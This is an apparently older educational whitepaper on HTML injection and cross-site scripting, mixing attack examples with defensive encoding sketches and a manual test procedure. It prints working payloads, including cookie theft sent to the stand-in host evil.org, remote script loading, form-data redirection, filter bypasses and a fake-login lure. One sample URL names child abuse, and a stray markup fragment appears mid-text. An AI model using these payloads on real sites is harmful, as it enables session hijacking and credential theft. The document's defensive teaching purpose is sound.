







HTML Code Injection and Cross-site scripting

Understanding the cause and effect of CSS (XSS) Vulnerabilities



As web-based applications have become more sophisticated, the range of vulnerabilities that attackers are capable of exploiting has rapidly increased. A particular class of attacks, commonly referred to as “code insertion” and often as “Cross-Site Scripting”, has become increasingly popular. Unfortunately, the number of applications vulnerable to these attacks is staggering, and the variety of ways in which attackers are successfully exploiting them is increasing. Analysis of many sites has indicated that not only are the majority of sites vulnerable, but they are vulnerable to many different methods and much of their content is affected.

Introduction

Web servers delivering dynamic content to Internet clients constitute an integral component of most organisations’ online service offerings. The ability to tune content and respond to an individual client request represents standard functionality for any successful site. Unfortunately, due to poorly developed application code and data processing systems, the majority of these successful sites are vulnerable to attacks that focus upon the way HTML content is generated and interpreted by client browsers. Attackers are often able to embed malicious HTML-based content within client web requests. With sufficient forethought and analysis, attackers can exploit these flaws by embedding scripting elements within the returned content without the knowledge of the site’s visitors.

Although the potential dangers have been known for several years now, recent successes and an improved understanding of cross-site scripting attacks have increased the importance of correctly handling user input within dynamically generated web content. High-profile sites have already been shown to be susceptible to cross-site scripting attacks. Future attacks are likely to become more sophisticated and, through automation and the exploitation of client browser vulnerabilities, many times more devastating.

This document aims to educate those responsible for the management and development of commercial online services by providing the information necessary to understand the significance of the threat, and to provide advice on securing applications against this type of attack.

Code Insertion

The success of this type of attack hinges upon the functionality of the client browser. In HTML, to distinguish displayable text from the interpreted markup language, some characters are treated specially. One of the most common special characters used to define elements within the markup language is the “<” character, which is typically used to indicate the beginning of an HTML tag. These tags can either affect the formatting of the page or introduce a program that the client browser executes (e.g. the <SCRIPT> tag introduces a JavaScript program).
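The following minimal JavaScript sketch shows why these characters matter. It replaces each of them with its HTML character entity, so the browser displays the text instead of interpreting it as markup. The function name escapeHtml is hypothetical and not taken from any particular library. The sketch only covers text placed in element content or in quoted attribute values, not text placed inside scripts or URLs.

```javascript
// Minimal sketch: encode the characters HTML treats specially so that
// user-supplied text is displayed as text instead of being parsed as markup.
function escapeHtml(text) {
  // '&' must be replaced first so the entities produced below are not re-escaped.
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// A <SCRIPT> tag becomes inert, displayable text.
console.log(escapeHtml("<SCRIPT>alert('hi')</SCRIPT>"));
// prints: &lt;SCRIPT&gt;alert(&#39;hi&#39;)&lt;/SCRIPT&gt;
```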

Because most web browsers interpret scripts embedded within HTML content by default, any script content that an attacker succeeds in injecting will probably be executed by the end user’s browser within the context of the delivering source (e.g. website, HTML help, etc.). Such scripts may be written in any number of scripting languages, provided that the client host can interpret the code. The tags most often used to embed malicious content include <SCRIPT>, <OBJECT>, <APPLET> and <EMBED>.

While this document largely focuses upon the threat presented by the injection of malicious scripting code, other tags may be inserted and abused by an attacker. Consider the <FORM> tag: by inserting the appropriate HTML tag information, an attacker could, for instance, modify the behaviour of an existing form and so trick visitors to the site into revealing sensitive information. Other HTML tags may be inserted to alter the appearance and behaviour of a page (e.g. altering an organisation’s online annual accounts or its president’s statement).

It is important to understand the HTML tags that are most commonly used to carry out code insertion attacks. The following table details the most important attributes of these tags. However, note that the current generation of web browsers will also interpret alternative “in-line” scripting elements, such as javascript:alert('executing script').

<SCRIPT>

Adds a script that is to be used in the document.

Attributes: type = Specifies the language of the script. Its value must be a media type (e.g. text/javascript). This attribute is required by the HTML 4.0 specification and is a recommended replacement for the “language” attribute.

language = Identifies the language of the script, such as JavaScript or VBScript.

src = Specifies the URL of an outside file containing the script to be loaded and run with the document. (Netscape only)

Supported by: Netscape, IE 3+, HTML 4, Opera 3+

<OBJECT>

Places an object (such as an applet, media file, etc.) on a document. The tag often contains information for retrieving ActiveX controls that IE uses to display the object.

Attributes: classid = Identifies the class identifier of the object.

codebase = Identifies the URL of the object’s codebase.

codetype = Specifies the media type of the code. Examples of code types include audio/basic, text/html, and image/gif. (IE and HTML 4.0 only)

data = Specifies the URL of the data used for the object.

name = Specifies the name of the object to be referenced by scripts on the page.

standby = Specifies the message to display while the object loads.

type = Specifies the media type for the data.

usemap = Specifies the imagemap URL to use with the object.

Supported by: Netscape, IE, HTML 4

<APPLET>

Used to place a Java applet on a document. It is deprecated in the HTML 4.0 specification in favour of the <OBJECT> tag.

Attributes: code = Specifies the class name of the code to be executed (required).

codebase = The URL from which the code is retrieved.

name = Names the applet for reference elsewhere on the page.

Supported by: Netscape, IE 3+, HTML 4

<EMBED>

Embeds an object into the document. Embedded objects are most often multimedia files that require special plug-ins to display. Specific media types and their respective plug-ins may have additional proprietary attributes for controlling the playback of the file. The closing tag is not always required, but is recommended. The tag is not part of the HTML 4.0 specification, which favours the <OBJECT> tag.

Attributes: hidden = Hides the media file or player from view when set to yes.

name = Specifies the name for the embedded object for later reference within a script.

pluginspage = Specifies the URL for information on installing the appropriate plug-in.

src = Provides the URL to the file or object to be placed on the document. (Netscape 4+ and IE 4+ only)

code = Specifies the class name of the Java code to be executed. (IE only)

codebase = Specifies the base URL for the application. (IE only)

pluginurl = Specifies a source for installing the appropriate plug-in for the media file. (Netscape only)

type = Specifies the MIME type of the plug-in needed to run the file. (Netscape only)

Supported by: Netscape, IE 3+, Opera 3+

<FORM>

Indicates the beginning and end of a form.

Attributes: action = Specifies the URL of the application that will process the form.

enctype = Specifies how the values for the form controls are encoded when they are submitted to the server.

method = Specifies which HTTP method will be used to submit the form data.

target = Specifies a target window in which the results of the form submission are loaded (_blank, _top, _parent or _self).

Supported by: All

Malicious Code

An embedded code attack is heavily dependent upon the delivery mechanism. Thus the delivery method often dictates the audience the script will potentially affect.

It is interesting to note that such attacks have been around since before the Internet and HTML. Back in the days of dial-up Bulletin Board Systems (BBS), the problem was site visitors encoding their messages in coloured ASCII; later, vector drawing languages permitted users to redesign pages themselves. Thus many sites hosting discussion groups with user interfaces learnt a long time ago to rigorously control the content that could be submitted.

An early problem for web-based discussion groups was the over-use and unintended misuse of standard HTML tags. For instance, early message boards merely took the user-submitted text from a standard POST form. This data was then added to the discussion page without any further processing. Users often included text formatting tags to bold, italicise or colour their text, giving their message a greater visual impact. Unfortunately, it was not uncommon for someone to forget to provide a closing format tag, with the unintended effect of altering every following message on the page. Now consider the implications for everyone viewing the message if a user embedded either of the following two code snippets in their posting:

Hello World! <SCRIPT>malicious code</SCRIPT>

Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov">

Unfortunately, attackers are finding ever more ingenious methods of encoding their embedded attacks, and consequently many more sites are vulnerable.

Of particular importance is the abuse of trust. Consider a trusted site with a poorly coded search engine. An attacker may be able to embed malicious code within a hyperlink to the site. When the client web browser follows the link, the URL sent to trusted.org includes the malicious code. The site sends a page back to the browser that includes the value of criteria, which consequently forces the execution of code from the attacker’s server (evil.org). For example:

<A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org</A>

In the attack above, one source is inserting code into pages sent by another source. It should be noted that this attack:

• disguises the link as a link to http://trusted.org,

• can be easily included in an HTML email message,

• does not supply the malicious code inline, but has it downloaded from http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at any time.
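The server-side half of this attack can be sketched in a few lines of JavaScript (Node.js). The handler below is hypothetical. It assumes search.cgi simply copies the criteria parameter into its results page, and all of the function names are illustrative. The unsafe version reproduces the flaw just described. The safer version HTML-encodes the same value before writing it out.

```javascript
// Hypothetical search results page for http://trusted.org/search.cgi,
// sketched only to illustrate the reflected attack described above.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

function criteriaFrom(requestUrl) {
  // searchParams returns the percent-decoded value of ?criteria=...
  return new URL(requestUrl).searchParams.get("criteria") || "";
}

// Vulnerable: the search criteria are copied into the page verbatim.
function renderResultsUnsafe(requestUrl) {
  return "<p>Results for: " + criteriaFrom(requestUrl) + "</p>";
}

// Safer: the criteria are HTML-encoded before being written out.
function renderResultsSafe(requestUrl) {
  return "<p>Results for: " + escapeHtml(criteriaFrom(requestUrl)) + "</p>";
}

// The link from the example, as followed by the victim's browser.
const link =
  "http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>";
console.log(renderResultsUnsafe(link)); // contains a live <SCRIPT SRC=...> element
console.log(renderResultsSafe(link));   // contains only &lt;SCRIPT ...&gt; text
```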

This class of vulnerability is popularly referred to as cross-site scripting (CSS or sometimes XSS).

Cross Site Scripting

A cross-site scripting vulnerability is caused by the failure of a web-based application to validate user-supplied input before returning it to the client system. “Cross-Site” refers to the security restrictions that the client browser usually places on data (i.e. cookies, dynamic content attributes, etc.) associated with a web site. By causing the victim’s browser to execute injected code under the same permissions as the web application domain, an attacker can bypass the traditional Document Object Model (DOM) security restrictions. This can result not only in cookie theft but also in account hijacking, changes to web application account settings, the spread of a webmail worm, etc.
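The browser restriction referred to here is usually called the same-origin policy. In a simplified model, two URLs share an origin only when their scheme, host and port all match. Real browsers apply further rules, for example to cookies and document.domain. The JavaScript sketch below uses the standard URL class; the helper name sameOrigin is hypothetical.

```javascript
// Simplified model of the browser's origin check: scheme, host and port
// must all match. Cookie scoping and document.domain rules are ignored.
function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

console.log(sameOrigin("http://trusted.org/search.cgi", "http://trusted.org/account.asp")); // true
console.log(sameOrigin("http://trusted.org/", "http://evil.org/"));                          // false
console.log(sameOrigin("http://trusted.org/", "https://trusted.org/"));                      // false (scheme differs)
console.log(sameOrigin("http://trusted.org/", "http://trusted.org:8080/"));                  // false (port differs)
```

Injected script arrives inside a page served by trusted.org, so the browser evaluates it against trusted.org's origin rather than evil.org's. This is why the restrictions that would normally confine the attacker's own scripts do not apply.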

Note that the access that an intruder has to the Document Object Model (DOM) is dependent on the security architecture of the language chosen by the attacker. Specifically, Java applets do not provide the attacker with any access beyond the DOM and are restricted to what is commonly referred to as a sandbox.

The most common web components that fall victim to CSS/XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Additionally, a victim doesn’t necessarily have to click on a link; CSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.

The most popular (and most devastating) CSS/XSS attack is the harvesting of authentication cookies and session management tokens. With this information, it is often a trivial exercise for an attacker to hijack the victim’s active session, completely bypassing the authentication process. Unfortunately, the mechanism of the attack is very simple and can be easily automated. A detailed paper by iDefence explains the process in depth, but it can be quickly summarised as follows:

1. The attacker investigates an interesting site that normal users must authenticate to in order to gain access, and that tracks the authenticated user through the use of cookies or session IDs.

2. The attacker finds a CSS-vulnerable page on the site, for instance http://trusted.org/account.asp.

3. Using a little social engineering, the attacker creates a special link to the site and embeds it in an HTML email that he sends to a long list of potential victims.

4. Embedded within the special link are some coding elements specially designed to transmit a copy of the victim’s cookie back to the attacker. For instance:

<img src="http://trusted.org/account.asp?ak=<script>document.location.replace('http://evil.org/steal.cgi?'+document.cookie);</script>">

5. Unknown to the victim, the attacker has now received a copy of their cookie information.

6. The attacker now visits the web site and, by substituting his cookie information with that of the victim, is perceived by the server application to be the victim.

Note that cross-site scripting is commonly referred to as CSS and/or XSS.

Understanding Code Insertion

To date, security professionals have discovered an ever-increasing number of methods for potentially embedding code within poorly configured web applications. The following are some of the more common methods for doing so.
Inline Scripting

http://trusted.org/search.cgi?criteria=<script>code</script>

http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>

http://trusted.org/COM2.IMG%20src="Javascript:alert(document.domain)"

Forced Error Responses

http://trusted.org/<script>code</script>

This form of insertion usually occurs because of poor error handling by the web server or application component. The application fails to find the requested page and reports an error that unfortunately includes the unprocessed script data.

http://trusted.org/search.cgi?blahblahblahblahblah<script>code</script>
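A hypothetical error handler shows how this happens. The JavaScript (Node.js) sketch below assumes a handler that builds its “page not found” message from the request path; the handler and function names are illustrative only. The unsafe version echoes the decoded path verbatim, while the safer version encodes it first.

```javascript
// Hypothetical "page not found" handler, sketched to show how a forced
// error response can reflect script. Not taken from any real server.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

// The URL parser percent-encodes '<' and '>' in the path; a handler that
// decodes the path for display turns them back into markup characters.
function requestedPath(requestUrl) {
  const raw = new URL(requestUrl).pathname;
  try {
    return decodeURIComponent(raw);
  } catch {
    return raw; // malformed %-escapes: fall back to the raw path
  }
}

// Vulnerable: the decoded path is written into the error page verbatim.
function notFoundUnsafe(requestUrl) {
  return "<h1>Not Found</h1><p>" + requestedPath(requestUrl) + " does not exist.</p>";
}

// Safer: the same path is HTML-encoded before it is written out.
function notFoundSafe(requestUrl) {
  return "<h1>Not Found</h1><p>" + escapeHtml(requestedPath(requestUrl)) + " does not exist.</p>";
}

const probe = "http://trusted.org/<script>code</script>";
console.log(notFoundUnsafe(probe)); // ...<p>/<script>code</script> does not exist.</p>
console.log(notFoundSafe(probe));   // ...<p>/&lt;script&gt;code&lt;/script&gt; does not exist.</p>
```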

If a Java application such as a servlet fails to handle an error gracefully and allows stack traces to be sent to the user’s browser, an attacker can construct a URL that will throw an exception and add his malicious script to the end of the request.

http://trusted.org/servlet/org.apache.catalina.servlets.WebdavStatus/<script>code</script>

In the example above, when the Tomcat servlet is called with the illegitimate trailing request, an error page is served containing the offending text verbatim.

Non <SCRIPT> Events

" [event]='code'

In many cases it may be possible for an attacker to insert an exploit string with the above syntax into an HTML tag that was intended to look like:

<A HREF="exploit string">Go</A>

resulting in:

<A HREF="" [event]='code'">Go</A>

For example:

<b onMouseOver="self.location.href='http://evil.org/'">bolded text</b>

As the mouse cursor moves over the bolded text, an intrinsic event occurs and the JavaScript code is executed.

JavaScript Entities

<img src="&{alert('CSS Vulnerable')};">

In some browsers (notably Netscape Navigator), the special character “&” followed by “{” is interpreted as the start of a JavaScript code segment (a JavaScript entity).

Typical Payloads

<img src = "malicious.js">

<script>alert('hacked')</script>

<iframe src = "malicious.js">

<script>document.write('<img src="http://evil.org/'+document.cookie+'">')</script>

<a href="javascript:…">click-me</a>

Insertion Example

Dynamic URL Generation

Consider an application built to run on Microsoft’s Internet Information Server (IIS) web server platform. Dynamic content is delivered through IIS’s Active Server Pages (ASP).

Within the sample page, a dynamically built HTML tag for refining search parameters is constructed as follows:

<A HREF="http://trusted.org/search_main.asp?searchstring=SomeString">click-me</A>

and the ASP code required to generate a further query based upon this submitted information is:

<%
// Vulnerable: the SearchString value is written into the href attribute unencoded
var BaseUrl = "http://trusted.org/search2.asp?searchagain=";
Response.Write("<a href=\"" + BaseUrl + Request.QueryString("SearchString") + "\">click-me</a>");
%>

If the attacker were to replace “SomeString” with their own code, as follows:

<a href="http://trusted.org/search_main.asp?SearchString=%22+onmouseover%3D%27ClientForm%2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData%3D%22+%2B+ClientForm%2EPersonalData%3BClientForm%2Esubmit%28%29%3B%27">FooBar</a>

the likely result found in the dynamically generated ASP page will be:

<a href="http://trusted.org/search2.asp?searchagain=" onmouseover='ClientForm.action="evil.org/get.asp?Data=" + ClientForm.PersonalData;ClientForm.submit();'">click-me</a>

In this case, the attacker has injected an event handler into the generated page and used the page’s DOM to redirect form data to the attacker’s web site.

Bypassing Anti-CSS Filters

A key function of any application filtering process will be the removal of possibly dangerous special characters. However, in many circumstances it may be difficult to filter a large range of these characters because of the application’s unique requirements.
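click-me</A> In this case">
Instead of removing characters, an application can encode the value in the ASP example for the context in which it is written. The ASP example itself is written in JScript, so the sketch below uses JavaScript. It reproduces the vulnerable concatenation and contrasts it with a version that percent-encodes the value as a query component and then HTML-encodes the resulting attribute. BaseUrl and SearchString come from the example. The function names are hypothetical, and the attack string is one similar to the attacker's link.

```javascript
// JavaScript re-creation of the ASP (JScript) example. BaseUrl and the
// SearchString parameter come from the example; the function names are
// hypothetical.
const BaseUrl = "http://trusted.org/search2.asp?searchagain=";

// Mirrors the Response.Write call: the value is pasted straight into a
// double-quoted href attribute.
function buildLinkUnsafe(searchString) {
  return '<a href="' + BaseUrl + searchString + '">click-me</a>';
}

// HTML-encodes a value for use inside a quoted attribute.
function escapeAttr(text) {
  return String(text)
    .replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/'/g, "&#39;")
    .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Encodes for both contexts: percent-encode the value as a query
// component, then HTML-encode the whole URL for the attribute.
function buildLinkSafe(searchString) {
  const url = BaseUrl + encodeURIComponent(searchString);
  return '<a href="' + escapeAttr(url) + '">click-me</a>';
}

// An attacker-supplied SearchString, decoded the way a server decodes a
// form-encoded query ('+' means a space).
const encoded =
  "%22+onmouseover%3D%27ClientForm%2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData%3D%22" +
  "+%2B+ClientForm%2EPersonalData%3BClientForm%2Esubmit%28%29%3B%27";
const searchString = decodeURIComponent(encoded.replace(/\+/g, " "));

console.log(buildLinkUnsafe(searchString)); // href closes early; an onmouseover attribute appears
console.log(buildLinkSafe(searchString));   // '"' becomes %22, so the href cannot be closed early
```

The design choice here is to encode for the output context rather than to strip characters. Both quote characters stay available to legitimate searches, yet neither can terminate the attribute.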

Corporate application developers must carefully evaluate how their code will perform against a variety of attack strings. In addition, they should fully understand the different ways in which special characters can be encoded.

One of the most popular alternative character representations is URL encoding (also known as percent-encoding or escaped encoding), sometimes mistakenly referred to as Unicode encoding. In this system, the hexadecimal value of the ASCII character is prefixed with the “%” character.

Char   ;    /    ?    :    @    =    &    <    >    "    #
Code   %3b  %2f  %3f  %3a  %40  %3d  %26  %3c  %3e  %22  %23

Char   {    }    |    \    ^    ~    [    ]    `    %    '
Code   %7b  %7d  %7c  %5c  %5e  %7e  %5b  %5d  %60  %25  %27

To better understand the processes behind bypassing anti-CSS filtering mechanisms, a series of detailed examples is provided below.

Inserting Malicious Code

Simple Filtering of “<” and “>”

Many applications that implement some kind of content filtering will typically filter out the “<” and “>” characters on the client side. At first glance, this looks like an effective way of ensuring that <script>-type HTML tags are not possible. Unfortunately, not only is client-side code easy to bypass, but in many circumstances the filter can be defeated using a mix of alternative character representations and other special characters.
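The weakness is one of ordering. A filter that inspects input before it has been fully decoded cannot see characters supplied in an alternative representation. The JavaScript sketch below strips literal “<” and “>” characters and then decodes the result, as an application might if it unescapes data after filtering. Percent-encoded tags written using the scheme in the table pass straight through. All function and variable names are hypothetical.

```javascript
// Hypothetical "anti-CSS" filter that only strips literal '<' and '>'.
function stripAngleBrackets(input) {
  return input.replace(/[<>]/g, "");
}

// Percent-encoding as in the table: '%' followed by two hex digits.
function percentEncode(ch) {
  return "%" + ch.charCodeAt(0).toString(16).padStart(2, "0");
}

const payload = "<script>alert('CSS Vulnerable')</script>";
// Encode only the filtered characters, leaving the rest readable.
const encodedPayload = payload.replace(/[<>]/g, percentEncode);

// The filter sees no '<' or '>' and lets the string through unchanged...
const filtered = stripAngleBrackets(encodedPayload);
// ...but a later decoding step restores the tags before the page is built.
const rendered = decodeURIComponent(filtered);

console.log(encodedPayload); // %3cscript%3ealert('CSS Vulnerable')%3c/script%3e
console.log(rendered);       // <script>alert('CSS Vulnerable')</script>
```

The tentative lesson is that any filtering should operate on fully decoded data. Output should also be encoded for the context it is written into, instead of relying on the removal of a few characters.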

Consider a routine that removes the “<” and “>” special characters:

document.write(cleanSearchString('<>'));

The attacker now uses alternative encodings for the filtered characters, “\x3c” and “\x3e” respectively, and begins their code with “') +” to escape out of the routine:

' ) + '\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e'

Commenting out malicious code

Consider an application that filters content on behalf of its clients by causing any scripting content to be “safely” commented out. For instance, <script>code</script> is filtered by the application to become:

<COMMENT>

<!--

code (NOT PARSED BY FILTER)

//-->

</COMMENT>

Unfortunately, it is a simple task to bypass the filter. This is accomplished by including script code that closes the <COMMENT> wrapper. For example, the attacker can send the following code:

<script>

- -->

</COMMENT>

<img src="http://none" onerror="alert(document.cookie);window.open('http://evil.org/fakeloginscreen.jsp');">

</script>

After processing by the filter, the following code is embedded in the returned document:

<COMMENT>

<!--

- -->

</COMMENT>

<img src="http://none" onerror="alert(document.cookie);window.open('http://evil.org/fakeloginscreen.jsp');">

</COMMENT>

This particular attack was originally designed to bypass the security filtering processes of a large web-mail provider, and would have been embedded in HTML email content. Users viewing the email would automatically be prompted with a fake login screen, making for an easy method of harvesting user names and passwords.

Separate Window Handling

A popular method of handling potentially dangerous URL information is to force the URL to be opened in a new browser window by adding target="_blank" to the HTML <A> tag. This causes any malicious code to be executed in the context of a different DOM.
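A rewrite of this kind is often implemented as simple text substitution rather than by parsing the HTML. The JavaScript sketch below is a hypothetical, deliberately naive version. The function name addTargetBlank is an assumption, as is the javascript:alert(1) stand-in for a script link. Because it edits text inside a tag whose quoting the submitter controls, it quietly trusts that the submitted tag is well formed.

```javascript
// Hypothetical, deliberately naive link rewrite: it treats the HTML as
// plain text and inserts target="_blank" before the '>' that ends each
// opening <a> tag. It relies on the submitter's quoting being balanced.
function addTargetBlank(html) {
  return html.replace(/<a\b([^>]*)>/gi, '<a$1 target="_blank">');
}

// A well-formed link is rewritten as intended:
console.log(addTargetBlank('<a href="javascript:alert(1)">click-me</a>'));
// <a href="javascript:alert(1)" target="_blank">click-me</a>
```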

Unfortunately, in many online email applications it is possible to bypass this protection after analysing how the site processes a “harmless” link.

Consider a site that parses the content,

<a href="javascript:…">click-me</a>

and, after processing, becomes:

<a href="javascript:…" target="_blank">click-me</a>

This causes the URL to be opened in a new window. However, if the attacker constructs his HREF as follows,

<a href="javascript:..." foo="bar>click-me</a>

it will be interpreted as:

<a href="javascript:..." foo="bar target="_blank">click-me</a>

causing the code to be executed in the same page, under the same DOM.

Escaped JavaScript Entities

In cases where almost all special characters are filtered from user-supplied strings, attackers must encode the entire attack string.

Consider the following URL:

http://trusted.org/search.cgi?query=%26%7balert%28%27EVIL%27%29%7d%3b&apropos=pos2

The “%26%7balert%28%27EVIL%27%29%7d%3b” resolves to &{alert('EVIL')}; causing, in this instance, an unexpected JavaScript alert window to pop up with the text “EVIL”.

Web Integration

As client web browsers have evolved, they have incorporated an increasingly diverse range of functions. At the same time, many common desktop applications have extended their functionality to replicate or incorporate the functionality of these same browsers. While the security flaw may be HTML injection, and more specifically CSS, the avenues available for a malicious user or attacker to initiate the attack are becoming ever broader. As is already evident, HTML email has become a popular “personalised” delivery mechanism. Unfortunately, the delivery methods are becoming so diverse that no “single” security solution is available to prevent the attack. Consider the significance of the following delivery mechanisms.

The Flash! Attack

Flash! is a popular application for displaying animated visual information. It has its own development language (ActionScript) for creating sophisticated interactive menus, animated movies and games. The most popular web browsers often install the interpreter for these files by default and, due to the large number of sites that use the technology, many people will install the interpreter even if it wasn’t originally available with their web browser.

ActionScript has an internal function called getURL(). This function is used for redirecting the client browser to another page. Normally the parameter supplied to the function would be a URL. However, due to integration features between the Flash! interpreter and the web browser, it is possible to insert scripting code that will be successfully interpreted by the client web browser. For instance, instead of:

getURL("http://www.technicalinfo.net")

it is possible to specify scripting code:

getURL("javascript:alert(document.cookie)")

Thus, it is possible to embed potentially dangerous scripting elements within a common file format. The real significance of this threat is that it potentially bypasses many corporate content inspection systems (particularly those that filter out HTML <script>-type tags) as well as local web browser security settings.
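One way to narrow this avenue is to accept only an explicit list of schemes wherever an application takes a URL that will later be followed, whether that is a getURL() target, an href or a redirect. The JavaScript sketch below is an illustration under stated assumptions, not a Flash-specific fix. The helper name isAllowedUrl, the allowlist and the base URL are all hypothetical. The sketch relies on the WHATWG URL parser built into browsers and Node.js, which lower-cases the scheme, strips leading and trailing spaces, and removes embedded tabs and newlines.

```javascript
// Hypothetical helper: accept a URL only if its scheme is on an allowlist.
// The URL parser normalises case and whitespace, so variants such as
// " JavaScript:..." or "java\tscript:..." are classified as javascript:.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

function isAllowedUrl(candidate, base = "http://trusted.org/") {
  try {
    // Relative URLs are resolved against the (assumed) base URL.
    return ALLOWED_SCHEMES.has(new URL(candidate, base).protocol);
  } catch {
    return false; // unparseable input is rejected
  }
}

console.log(isAllowedUrl("http://www.technicalinfo.net"));      // true
console.log(isAllowedUrl("javascript:alert(document.cookie)"));  // false
console.log(isAllowedUrl(" JavaScript:alert(document.cookie)")); // false
console.log(isAllowedUrl("/search.cgi?criteria=test"));          // true
```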

For an attack to be successful, the dangerous Flash! file (typically with a “.swf” extension) must be embedded within HTML data for viewing by remote clients. Normally this occurs through the use of the <EMBED> or <OBJECT> tags, for instance:

<EMBED
src="http://evil.org/badflash.swf"
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash"
width="100"
height="100">
</EMBED>

The Impact

The impact of malicious code insertion is often difficult to quantify and will change as new functionality or interactions are incorporated into both web servers and client browsers. Already, users may unintentionally execute scripts written by an attacker when they follow untrusted links in web pages, mail or instant messages, or in any other application capable of displaying HTML content (e.g. Microsoft Help). For this reason, a series of examples best illustrates the diversity and impact of potential threats. Consider the following examples:

An attacker often has access to the retrieved document, since the malicious scripts are executed in a context that appears to have originated from the trusted site. With the appropriate insertions, a script could be used to read fields in a form provided by the trusted server and send this data back to the attacker.

An attacker may be able to embed script code that has additional interactions with the legitimate web server without alerting the victim. For example, the attacker could develop an exploit that posted data to a different page on the legitimate web server.

An attacker may be able to poison the site’s persistent cookies, modifying the cookie content so that malicious code is executed each time the user visits the trusted site. The malicious code is stored as a field variable within the cookie, and is executed each time the site dynamically generates page content without processing it correctly.

An attacker may be able to start a “hidden window” on the client machine and use it to log all of the victim’s browser interaction. Should the victim later visit sites requiring authentication, the attacker could harvest the victim’s credentials.

CSS-type attacks can occur over SSL-encrypted connections. The victim, accessing a trusted host over HTTPS, may still execute an attacker’s code unintentionally. If the attacker references document components on a remote host, the victim’s client browser may generate a warning message about the insecure connection. However, the attacker can circumvent this warning by simply referencing content on an SSL-capable web server.

An attacker may construct the malicious code to reference internal resources. Thus, an attacker may gain unauthorised access to an Intranet web server. Only one page on one web server in a domain is required to compromise the entire domain.

An attacker may be able to bypass policies that prevent the victim browser from executing scripts. For example, Internet Explorer security “zones” may prevent the execution of scripts from untrusted Internet hosts. An attacker may embed their code within the content of a trusted internal host.

An attacker may add a social engineering element to the attack. Consider an application that requires clients to complete a form to set up their account. An attacker may be able to insert malicious code into their application data. A quick phone call to the corporate help-desk asking for advice on their account may then cause the malicious code to execute on the help-desk system.

Even if the victim’s web browser does not support scripting, an attacker may still be able to alter the content of the page, affecting its appearance, behaviour or normal operation. To date, the application content most commonly targeted by attackers has been web pages that:

• return results based upon user input to search engines,

• process credit card information,

• store user-supplied content in databases and cookies for later retrieval.

Vulnerability Checking

Finding out if your application is vulnerable to a code insertion attack is often very simple. The key lies in the analysis of the dynamically generated client-side HTML content. The following process has frequently been used in the past.

1. For each visible input field (these may be located in an HTML form, or represented in the URL as “variable=”), try the most obvious scripting formats:

<script>alert('CSS Vulnerable')</script>

<img csstest=javascript:alert('CSS Vulnerable')>

&{alert('CSS Vulnerable')};

In each case, should an alert message pop up with the text “CSS Vulnerable”, the application component (specifically the input field just checked) is vulnerable.

2. If any of the above scripting checks causes the HTML page to display incorrectly, the application component may still be vulnerable.

3. For each visible variable, submit/substitute the following string (note that it begins with two single quotes):

'';!--"<CSS_Check>=&{()}

4. On the resultant page, search for the string “<CSS_Check>”. If you discover “<CSS_Check>”, it is quite probable that the application component is vulnerable. However, if the word CSS_Check appears in an encoded form such as &lt;CSS_Check&gt;, then it may not be vulnerable. If input is displayed literally at ANY point in the document, it can be used to divert the flow of execution to an attacker-supplied payload.

5. Having located the word CSS_Check, verify which (if any) other characters have been altered or filtered from the original string '';!--"<CSS_Check>=&{()}. Depending upon the filtered characters, the application component may still be vulnerable.

6. Looking closely at the returned HTML code, identify the specific string an attacker would need to break out of the current HTML tag or code sequence. If these characters exist, unfiltered, in responses to the test string of part 3 (above), then there is a high probability that the application component is vulnerable.

7. Moving on from the obvious fields, repeat the process for all the hidden fields not normally editable at the client end. The best method of doing this is to use a free local proxy server such as Achilles by the DigiZen Security Group or WebProxy by @stake. These proxy servers allow HTTP requests to be edited as they leave the client application, before they are finally sent to the server application.

8. In many cases, data will be submitted via an HTTP GET request. Throughout the investigation, take note of potentially vulnerable application components that require the HTTP POST command to submit data. It is a simple process to turn a POST into a GET submission. If the application component fails to respond to the GET in the same way as it did to the POST submission, it is probably not vulnerable to a URL-based inline scripting attack.
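Parts of this manual process lend themselves to simple scripting. The JavaScript sketch below classifies how the <CSS_Check> probe was reflected in a response. It also converts a captured POST body into an equivalent GET URL. The helper names are hypothetical, and the sketch assumes you have already captured the response and request bodies, for example through one of the local proxies mentioned earlier. It sends no requests itself.

```javascript
// Hypothetical helpers for the manual checking process. They work on a
// response body and a POST body that have already been captured.
const PROBE = "'';!--\"<CSS_Check>=&{()}"; // the test string from part 3

// Classifies how the probe's <CSS_Check> tag came back in a response.
function classifyReflection(html) {
  if (html.includes("<CSS_Check>")) return "literal";        // quite probably vulnerable
  if (html.includes("&lt;CSS_Check&gt;")) return "encoded";  // may not be vulnerable
  if (html.includes("CSS_Check")) return "altered";          // inspect which characters changed
  return "absent";                                           // not reflected in this response
}

// Rebuilds a captured form-encoded POST body as an equivalent GET URL,
// so the same submission can be retried as a plain link.
function postToGetUrl(actionUrl, body) {
  const url = new URL(actionUrl);
  url.search = new URLSearchParams(body).toString();
  return url.toString();
}

console.log(classifyReflection("<p>Your search: <CSS_Check></p>")); // literal
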